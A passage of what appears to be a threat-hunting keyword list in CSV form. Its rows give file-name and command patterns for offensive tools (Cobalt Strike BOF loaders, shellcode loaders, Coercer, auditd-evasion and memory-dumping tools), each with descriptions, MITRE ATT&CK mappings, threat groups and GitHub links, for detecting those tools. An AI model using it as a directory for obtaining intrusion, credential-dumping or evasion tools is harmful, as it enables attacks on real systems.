software not tested).,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Axx8/ShellCode_Loader,1,0,N/A,10,10,389,49,2022-09-20T07:24:25Z,2022-09-02T14:41:18Z -*codeload.github.com/*,greyware_tool_keyword,github,Github executables download initiated - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*codeLoader/codeLoader.*,offensive_tool_keyword,C2 related tools,A shellcode loader written using nim,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/aeverj/NimShellCodeLoader,1,1,N/A,10,10,555,105,2023-08-26T12:48:08Z,2021-01-19T15:57:01Z -*codewatchorg/bypasswaf*,offensive_tool_keyword,bypasswaf,Add headers to all Burp requests to bypass some WAF products,T1090 - T1189 - T1001,TA0002 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/codewatchorg/bypasswaf,1,1,N/A,N/A,4,323,117,2018-01-28T13:13:39Z,2014-11-17T01:29:35Z -*codewatchorg/sqlipy*,offensive_tool_keyword,sqlipy,SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.,T1190 - T1210 - T1574,TA0002 - TA0040 - TA0043,N/A,N/A,Network Exploitation tools,https://github.com/codewatchorg/sqlipy,1,1,N/A,N/A,3,247,102,2023-05-08T18:50:41Z,2014-09-22T03:25:42Z -*codewhitesec/apollon*,offensive_tool_keyword,apollon,evade auditd by writing /proc/PID/mem,T1054.001 - T1055.001 - T1012,TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/apollon,1,1,N/A,8,1,13,5,2023-08-21T05:43:36Z,2023-07-31T11:55:43Z -*codewhitesec/daphne*,offensive_tool_keyword,daphne,evade auditd by tampering via ptrace,T1054.004 - T1012 - T1057,TA0003 - TA0007,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/daphne,1,1,N/A,8,1,12,2,2023-08-03T08:31:40Z,2023-07-31T11:57:29Z -*Coercer coerce*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,0,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*coercer -d * -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Coercer fuzz*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,0,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*Coercer scan*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,0,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*coercer.core*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*coercer.methods*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*coercer.models*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*coercer.network*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*Coercer.py *,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,0,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*coercer.structures*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*coercer/core/loader*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*coercer_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*coff_definitions.h*,offensive_tool_keyword,cobaltstrike,Load and execute COFF files and Cobalt Strike BOFs in-memory,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/COFFLoader2,1,1,N/A,10,10,156,40,2022-09-13T14:58:30Z,2021-12-14T07:49:17Z -*COFF_Loader.*,offensive_tool_keyword,cobaltstrike,Load and execute COFF files and Cobalt Strike BOFs in-memory,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/COFFLoader2,1,1,N/A,10,10,156,40,2022-09-13T14:58:30Z,2021-12-14T07:49:17Z -*COFF_PREP_BEACON*,offensive_tool_keyword,cobaltstrike,Beacon Object File Loader,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cracked5pider/CoffeeLdr,1,1,N/A,10,10,230,31,2022-11-07T20:56:54Z,2022-07-18T15:21:11Z -*CoffeeLdr* go *,offensive_tool_keyword,cobaltstrike,Beacon Object File Loader,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cracked5pider/CoffeeLdr,1,0,N/A,10,10,230,31,2022-11-07T20:56:54Z,2022-07-18T15:21:11Z -*CoffeeLdr.x64.exe*,offensive_tool_keyword,cobaltstrike,Beacon Object File Loader,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cracked5pider/CoffeeLdr,1,1,N/A,10,10,230,31,2022-11-07T20:56:54Z,2022-07-18T15:21:11Z -*CoffeeLdr.x86.exe*,offensive_tool_keyword,cobaltstrike,Beacon Object File Loader,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cracked5pider/CoffeeLdr,1,1,N/A,10,10,230,31,2022-11-07T20:56:54Z,2022-07-18T15:21:11Z -*COFFELDR_COFFELDR_H*,offensive_tool_keyword,cobaltstrike,Beacon Object File Loader,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cracked5pider/CoffeeLdr,1,1,N/A,10,10,230,31,2022-11-07T20:56:54Z,2022-07-18T15:21:11Z -*coffexec *.o *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*COFFLdr.cpp*,offensive_tool_keyword,Jormungandr,Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel,T1215 - T1059.003 - T1547.006,TA0004 - TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Idov31/Jormungandr,1,1,N/A,N/A,3,203,23,2023-09-26T18:06:53Z,2023-06-25T06:24:16Z -*COFFLdr.exe*,offensive_tool_keyword,Jormungandr,Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel,T1215 - T1059.003 - T1547.006,TA0004 - TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Idov31/Jormungandr,1,1,N/A,N/A,3,203,23,2023-09-26T18:06:53Z,2023-06-25T06:24:16Z -*COFFLoader.*,offensive_tool_keyword,cobaltstrike,This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/COFFLoader,1,1,N/A,10,10,386,62,2023-05-15T20:42:41Z,2021-02-19T19:14:43Z -*COFFLoader64.exe*,offensive_tool_keyword,cobaltstrike,This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/COFFLoader,1,1,N/A,10,10,386,62,2023-05-15T20:42:41Z,2021-02-19T19:14:43Z -*CognisysGroup/HadesLdr*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,1,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*coinomi2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*coldfusion_dir_traversal_exploit*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*Collection/MiniDumpWriteDump.*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Collection_ArchiveCollectedData_ArchiveViaCustomMethod.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Collection_ArchiveCollectedData_ArchiveViaCustomMethod_7z.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*com.rastamouse.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*com_exec_go(*,offensive_tool_keyword,cobaltstrike,Bloodhound Attack Path Automation in CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/vysecurity/ANGRYPUPPY,1,0,N/A,10,10,300,93,2020-04-26T17:35:31Z,2017-07-11T14:18:07Z -*combine_harvester-main*,offensive_tool_keyword,combine_harvester,Rust in-memory dumper,T1055 - T1055.001 - T1055.012,TA0005 - TA0006,N/A,N/A,Defense Evasion,https://github.com/m3f157O/combine_harvester,1,1,N/A,10,2,101,17,2023-07-26T07:16:00Z,2023-07-20T07:37:51Z -*com-exec.cna*,offensive_tool_keyword,cobaltstrike,Bloodhound Attack Path Automation in CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/vysecurity/ANGRYPUPPY,1,1,N/A,10,10,300,93,2020-04-26T17:35:31Z,2017-07-11T14:18:07Z -*COMHunter* -inproc*,offensive_tool_keyword,COMHunter,Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI,T1087.002 - T1012 - T1057,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*COMHunter* -localserver*,offensive_tool_keyword,COMHunter,Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI,T1087.002 - T1012 - T1057,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*COMHunter.csproj*,offensive_tool_keyword,COMHunter,Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI,T1087.002 - T1012 - T1057,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*COMHunter.exe*,offensive_tool_keyword,COMHunter,Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI,T1087.002 - T1012 - T1057,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*COMHunter.sln*,offensive_tool_keyword,COMHunter,Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI,T1087.002 - T1012 - 